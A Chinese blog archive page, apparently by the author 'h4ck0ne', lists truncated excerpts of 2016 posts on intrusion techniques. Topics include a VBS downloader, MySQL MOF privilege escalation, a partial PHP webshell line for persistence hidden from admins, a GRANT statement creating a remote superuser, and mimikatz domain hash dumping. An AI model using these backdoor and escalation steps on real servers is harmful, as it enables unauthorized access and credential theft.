上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 16 下一页
摘要: 当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望一、VBS下载者: 复制代码 代码如下:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObjec... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(506) 评论(0) 推荐(0) 编辑
摘要: 今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普这里我综合各类mof提权进行了综合首先说一下,无shell情况下的mysql远程mof提权利用方法详解 就是你注入拿到了数据库的root账号密码,直接进行 扫到一个站的注入 ... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(3260) 评论(0) 推荐(0) 编辑
摘要: 经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。<?phpfile_put_contents('xpxp.php',"$_GET[... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(255) 评论(0) 推荐(0) 编辑
摘要: 经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(4806) 评论(0) 推荐(0) 编辑
摘要: PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WIT... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(2144) 评论(0) 推荐(0) 编辑
摘要: 前言 Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1739) 评论(1) 推荐(1) 编辑
摘要: 0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携、易扩展 0x02特点 提到中间人攻击,最知名的莫过于ettercap,而开发bettercap的目的不是为了追赶它,而是替代它 原因如下: 1、ettercap很成功,但在新时代下它已经老了 2、et... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(539) 评论(0) 推荐(0) 编辑
摘要: 0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: ... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1322) 评论(0) 推荐(0) 编辑
摘要: 0x00 前言 上一篇学习了如何导出域内所有用户hash,那么,接下来准备用破解出的用户名口令尝试远程登陆目标主机并执行程序,结合实际环境做了如下测试.0x01 目标 远程登陆目标主机执行测试程序 0x02 测试环境 远程主机: ip:192.168.40.137 ... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(2684) 评论(0) 推荐(0) 编辑
摘要: 0x00目标: 导出当前域内所有用户的hash0x01测试环境: 域控:server2008 r2杀毒软件:已安装*域控权限:可使用net use远程登陆,不使用33890x02测试方法: (1)mimikatz: hash数量:只能抓取登陆过的用户hash,无法抓取所有... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(2373) 评论(0) 推荐(0) 编辑
上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 16 下一页